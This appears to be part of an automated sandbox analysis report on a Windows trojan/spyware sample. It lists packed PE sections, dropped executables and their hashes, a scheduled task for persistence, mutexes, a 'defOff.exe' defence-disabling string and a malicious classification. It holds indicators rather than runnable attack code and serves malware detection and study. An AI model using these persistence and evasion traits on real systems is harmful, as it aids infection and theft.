Source: 036e90e395.exe, 0000001F.00000000.2980992335.0000000000572000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_ea5f573d-d
Source: 036e90e395.exe, 0000001F.00000000.2980992335.0000000000572000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_37b2469c-2
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: CT1ROX8L8OCI432H.exe.0.dr Static PE information: section name:
Source: CT1ROX8L8OCI432H.exe.0.dr Static PE information: section name: .idata
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: section name:
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: section name: .idata
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: 21024c5511.exe.8.dr Static PE information: section name:
Source: 21024c5511.exe.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: 996773cd54.exe.8.dr Static PE information: section name:
Source: 996773cd54.exe.8.dr Static PE information: section name: .rsrc
Source: 996773cd54.exe.8.dr Static PE information: section name: .idata
Source: 996773cd54.exe.8.dr Static PE information: section name:
Source: QEDBGN5ZBSJ2P7FMKVJ.exe.9.dr Static PE information: section name:
Source: QEDBGN5ZBSJ2P7FMKVJ.exe.9.dr Static PE information: section name: .idata
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: section name:
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: section name: .idata
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: section name:
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: section name:
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: section name: .idata
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: section name:
Source: NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe.14.dr Static PE information: section name:
Source: NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe.14.dr Static PE information: section name: .idata
Source: num[1].exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.8.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017728D0 0_3_017728D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017728D0 0_3_017728D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017728D0 0_3_017728D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017728D0 0_3_017728D0
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Code function: 3_2_0043CA6D 3_2_0043CA6D
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Code function: 3_2_002CDD67 3_2_002CDD67
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Code function: 9_3_013114B2 9_3_013114B2
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Code function: 9_3_012ECE71 9_3_012ECE71
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe 3B6C154CB62E1D8797B300EC8615F3CDFB692F5A31B3F6AB5B66278549332D4D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe A8ADDC675FCC27C94FF9E4775BB2E090F4DA1287AAE6B95CECC65CCF533BC61D
Source: file.exe, 00000000.00000003.2229765185.0000000006334000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2214793956.0000000006338000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235621705.0000000006335000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236790609.000000000658B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216262160.0000000006193000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2233326043.0000000006428000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217027543.00000000063D6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2233961350.000000000633F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219245812.0000000006341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2226382411.0000000006336000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238248015.0000000006332000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236290322.0000000006332000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220081427.000000000633F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2215741131.00000000063E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238655441.000000000633F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238118124.0000000006466000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236624141.000000000645E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216427832.000000000633A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235511542.0000000006448000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220246815.00000000063F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2231124502.000000000641A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219028101.00000000064A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221687401.0000000006333000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2254132854.00000000065F8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220469650.0000000006339000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2215007557.000000000619B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236125497.0000000006461000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2259520264.0000000005EA7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222302409.0000000006339000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2233615083.000000000652C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235244485.0000000006561000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234346006.000000000633B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2214262354.0000000005FB2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2239469134.0000000006336000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2259568070.0000000005F79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2231346204.0000000006503000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2239064289.0000000006333000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2239973931.0000000006487000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2232799484.0000000006332000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2224048010.000000000641F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237566615.0000000006589000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218493206.000000000648F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2230881219.0000000006333000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221102282.0000000006400000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234597395.000000000654C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234474602.000000000643C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223215164.00000000064DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234087473.000000000643C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222909457.0000000006403000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237387563.000000000645D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234854486.000000000644E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238924404.00000000065C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237719082.0000000006335000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237066284.000000000645B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217633051.000000000648F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238794731.0000000006479000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236006842.0000000006334000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237227123.0000000006332000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235870441.0000000006559000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2215943752.000000000633B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219386464.00000000063FD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217968634.0000000006334000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235747337.0000000006442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217384780.00000000063E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2214556926.0000000006195000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234982483.0000000006335000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219569846.000000000633D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238014540.0000000006339000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216630819.00000000063D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2225834987.0000000006421000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2239835183.0000000006334000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2225570319.0000000006339000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2237882002.0000000006469000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223581631.000000000641B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2215424269.000000000633E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218860628.00000000063E4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2231936061.0000000006335000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218686209.0000000006337000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2217205514.0000000006338000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2232568537.000000000651C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2230407472.000000000641E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2222029807.00000000064C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2236950399.0000000006338000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221854816.0000000006401000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2218194375.00000000063D7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235374886.0000000006335000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216071729.00000000063DE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238520662.00000000065A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2221520964.00000000064CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2238388222.000000000646C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2216846255.0000000006335000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223430763.000000000633F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2239207846.0000000006473000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220764860.00000000063F8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2232335182.000000000642C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2226731135.0000000006417000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2239691964.0000000006488000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2235115205.0000000006443000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2219765550.00000000063F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234726293.000000000633C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2239334670.00000000065BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2220925888.0000000006339000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2234206579.000000000653F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2223772610.000000000633A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9981632053291536
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: Section: ZLIB complexity 0.9983555432561307
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: Section: xywzvhpg ZLIB complexity 0.9945391862115327
Source: skotes.exe.4.dr Static PE information: Section: ZLIB complexity 0.9983555432561307
Source: skotes.exe.4.dr Static PE information: Section: xywzvhpg ZLIB complexity 0.9945391862115327
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.9981632053291536
Source: 21024c5511.exe.8.dr Static PE information: Section: ZLIB complexity 0.9981632053291536
Source: random[1].exe0.8.dr Static PE information: Section: xugdxrgk ZLIB complexity 0.9951466213443748
Source: 996773cd54.exe.8.dr Static PE information: Section: xugdxrgk ZLIB complexity 0.9951466213443748
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: Section: ZLIB complexity 0.9983555432561307
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: Section: xywzvhpg ZLIB complexity 0.9945391862115327
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: Section: ZLIB complexity 0.9983555432561307
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: Section: xywzvhpg ZLIB complexity 0.9945391862115327
Source: R4UI5PZ4W045Z6XA.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.4.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: WFFF3RQI4OTCXKCYJD8SM6QSC.exe.9.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe.14.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@83/33@107/14
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Code function: 3_2_06DB15D0 ChangeServiceConfigA, 3_2_06DB15D0
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CT1ROX8L8OCI432H.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2824:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5636:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
